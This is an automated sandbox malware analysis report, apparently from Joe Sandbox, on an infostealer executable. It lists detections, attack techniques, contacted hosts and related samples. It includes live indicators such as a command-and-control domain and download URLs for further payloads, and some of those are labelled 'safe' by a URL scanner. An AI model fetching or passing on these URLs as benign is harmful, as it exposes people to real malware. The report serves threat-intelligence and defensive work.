                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials223
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                tTGxYWtjG5.exe68%ReversingLabsWin32.Infostealer.Tinba
                tTGxYWtjG5.exe51%VirustotalBrowse
                tTGxYWtjG5.exe100%AviraTR/Crypt.TPM.Gen
                tTGxYWtjG5.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://remote-app-switcher.stg-east.frontend0%Avira URL Cloudsafe
                https://observerfry.lat/apiy0%Avira URL Cloudsafe
                https://observerfry.lat/J0%Avira URL Cloudsafe
                https://observerfry.lat/Yec0%Avira URL Cloudsafe
                https://observerfry.lat/s0%Avira URL Cloudsafe
                https://bbc-object-storage--frontbucket.us-east-10%Avira URL Cloudsafe
                https://observerfry.lat/apij0%Avira URL Cloudsafe
                https://remote-app-switcher.prod-east.frontend.public.atl-paas.net0%Avira URL Cloudsafe
                https://observerfry.lat/apim0%Avira URL Cloudsafe
                https://aui-cdn.atlassia0%Avira URL Cloudsafe
                https://observerfry.lat:443/apiocal0%Avira URL Cloudsafe
                http://185.215.113.16/off/def.exeN/-0%Avira URL Cloudsafe
                https://bbc-frontbucket-canary.pro0%Avira URL Cloudsafe
                https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.0%Avira URL Cloudsafe
                https://observerfry.lat/(0%Avira URL Cloudsafe
                https://bbc-object-storage--frontbucket.us-east-1.prod.pu0%Avira URL Cloudsafe
                https://dz8aopenkvv6s.cloudfront.net0%Avira URL Cloudsafe
                https://observerfry.lat/apiER0%Avira URL Cloudsafe
                https://observerfry.lat/v0%Avira URL Cloudsafe
                https://remote-app-switcher.prod-0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                s3-w.us-east-1.amazonaws.com
                16.15.177.52
                truefalse
                  high
                  bitbucket.org
                  185.166.143.48
                  truefalse
                    high
                    observerfry.lat
                    172.67.199.72
                    truefalse
                      high
                      bbuseruploads.s3.amazonaws.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exefalse
                          high
                          https://observerfry.lat/apifalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0tTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://duckduckgo.com/chrome_newtabtTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0tTGxYWtjG5.exe, 00000001.00000002.1910462653.000000000073A000.00000004.00000010.00020000.00000000.sdmpfalse
                                  high
                                  https://observerfry.lat/apimtTGxYWtjG5.exe, 00000001.00000003.1474250511.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1432666855.00000000054B1000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1432032954.00000000054A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://remote-app-switcher.stg-east.frontendtTGxYWtjG5.exefalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://observerfry.lat/stTGxYWtjG5.exe, 00000001.00000003.1474101580.0000000000877000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://observerfry.lat/pitTGxYWtjG5.exe, 00000001.00000003.1357410577.000000000081E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://observerfry.lat/apijtTGxYWtjG5.exe, 00000001.00000002.1910553330.000000000081E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.nettTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe#CJtTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://observerfry.lat/apiytTGxYWtjG5.exe, 00000001.00000003.1406384434.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1406504023.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1406661276.00000000054B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://observerfry.lat/JtTGxYWtjG5.exe, 00000001.00000003.1436694130.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://bbuseruploads.s3.amazonaws.com:443tTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://bbc-object-storage--frontbucket.us-east-1tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://remote-app-switcher.prod-east.frontend.public.atl-paas.nettTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://x1.c.lencr.org/0tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://x1.i.lencr.org/0tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://observerfry.lat/YectTGxYWtjG5.exe, 00000001.00000003.1487811612.0000000000877000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://aui-cdn.atlassian.com/tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000888000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619213944.000000000088D000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3tTGxYWtjG5.exe, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://support.mozilla.org/products/firefoxgro.alltTGxYWtjG5.exe, 00000001.00000003.1408016793.00000000055CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://aui-cdn.atlassiatTGxYWtjG5.exefalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://bitbucket.org/tTGxYWtjG5.exefalse
                                                                  high
                                                                  https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.nettTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exetTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://observerfry.lat/(tTGxYWtjG5.exe, 00000001.00000003.1357410577.000000000081E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://observerfry.lat:443/apiocaltTGxYWtjG5.exe, 00000001.00000003.1487811612.000000000088E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icotTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://bbc-object-storage--frontbucket.us-east-1.prod.putTGxYWtjG5.exefalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://web-security-reports.services.atlassian.com/csp-report/bb-websitetTGxYWtjG5.exe, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000888000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619213944.000000000088D000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.tTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://upx.sf.netAmcache.hve.11.drfalse
                                                                                  high
                                                                                  https://observerfry.lat/tTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1487811612.0000000000877000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://ocsp.rootca1.amazontrust.com0:tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://nsis.sf.net/NSIS_ErrorErrortTGxYWtjG5.exe, 00000001.00000002.1916296960.0000000005B99000.00000002.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.ecosia.org/newtab/tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brtTGxYWtjG5.exe, 00000001.00000003.1408016793.00000000055CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://dz8aopenkvv6s.cloudfront.nettTGxYWtjG5.exe, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000888000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619213944.000000000088D000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://remote-app-switcher.prod-tTGxYWtjG5.exefalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://185.215.113.16/off/def.exeN/-tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.000000000085E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://ac.ecosia.org/autocomplete?q=tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://bbc-frontbucket-canary.protTGxYWtjG5.exefalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgtTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.nettTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://cdn.cookielaw.org/tTGxYWtjG5.exe, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000888000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619213944.000000000088D000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&utTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9etTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.tTGxYWtjG5.exefalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgtTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://observerfry.lat/apiERtTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000866000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://observerfry.lat/vtTGxYWtjG5.exe, 00000001.00000003.1357410577.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://remote-app-switcher.stg-east.frontend.public.atl-paas.nettTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://185.215.113.16/off/def.exetTGxYWtjG5.exe, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.000000000085E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://bbuseruploads.s3.amazonaws.com/tTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://bitbucket.org/zKtTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000866000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctatTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs
                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          172.67.199.72
                                                                                                                          observerfry.latUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          185.166.143.48
                                                                                                                          bitbucket.orgGermany
                                                                                                                          16509AMAZON-02USfalse
                                                                                                                          16.15.177.52
                                                                                                                          s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                          unknownunknownfalse
                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                          Analysis ID:1580288
                                                                                                                          Start date and time:2024-12-24 08:49:33 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 5m 47s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:16
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:tTGxYWtjG5.exe
                                                                                                                          renamed because original name is a hash value
                                                                                                                          Original Sample Name:6e0e190ce94e8017d60243ed97725433.exe
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@2/5@3/3
                                                                                                                          EGA Information:Failed
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 100%
                                                                                                                          • Number of executed functions: 0
                                                                                                                          • Number of non-executed functions: 0
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 52.168.117.173, 13.107.246.63, 20.109.210.53, 20.190.147.6
                                                                                                                          • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                          • Execution Graph export aborted for target tTGxYWtjG5.exe, PID 424 because there are no executed function
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                          TimeTypeDescription
                                                                                                                          02:50:37API Interceptor40x Sleep call for process: tTGxYWtjG5.exe modified
                                                                                                                          04:01:07API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          172.67.199.72iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                                                            ElmEHL9kP9.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                              yO9EAqDV15.exeGet hashmaliciousLummaCBrowse
                                                                                                                                Collapse.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  ZysXVT72cl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    NAnOVCOt4L.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      t8cdzT49Yr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                        zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                            NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                              185.166.143.48http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txtGet hashmaliciousUnknownBrowse
                                                                                                                                              • bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt
                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              observerfry.latiaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              4W3cB5WEYH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.36.201
                                                                                                                                              ElmEHL9kP9.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.36.201
                                                                                                                                              yO9EAqDV15.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              Collapse.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              xlSzrIs5h6.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                              • 104.21.36.201
                                                                                                                                              ZysXVT72cl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              NxqDwaYpbp.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.36.201
                                                                                                                                              NAnOVCOt4L.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              bitbucket.orgiaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 185.166.143.50
                                                                                                                                              yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 185.166.143.50
                                                                                                                                              NAnOVCOt4L.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 185.166.143.50
                                                                                                                                              fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                              • 185.166.143.48
                                                                                                                                              OtHVIQ2ge4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 185.166.143.49
                                                                                                                                              fr2Mul3G6m.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 185.166.143.49
                                                                                                                                              payment_3493.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 185.166.143.48
                                                                                                                                              FBmz85HS0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 185.166.143.50
                                                                                                                                              BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 185.166.143.48
                                                                                                                                              jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 185.166.143.49
                                                                                                                                              s3-w.us-east-1.amazonaws.comiaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 3.5.17.0
                                                                                                                                              yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 54.231.128.9
                                                                                                                                              http://plnbl.io/review/FSUQBEfTfzwHGet hashmaliciousUnknownBrowse
                                                                                                                                              • 54.231.128.17
                                                                                                                                              NAnOVCOt4L.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 3.5.27.149
                                                                                                                                              fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                              • 3.5.29.203
                                                                                                                                              OtHVIQ2ge4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 52.217.75.84
                                                                                                                                              fr2Mul3G6m.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 3.5.25.145
                                                                                                                                              payment_3493.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 3.5.29.153
                                                                                                                                              FBmz85HS0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 3.5.25.82
                                                                                                                                              BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 3.5.29.90
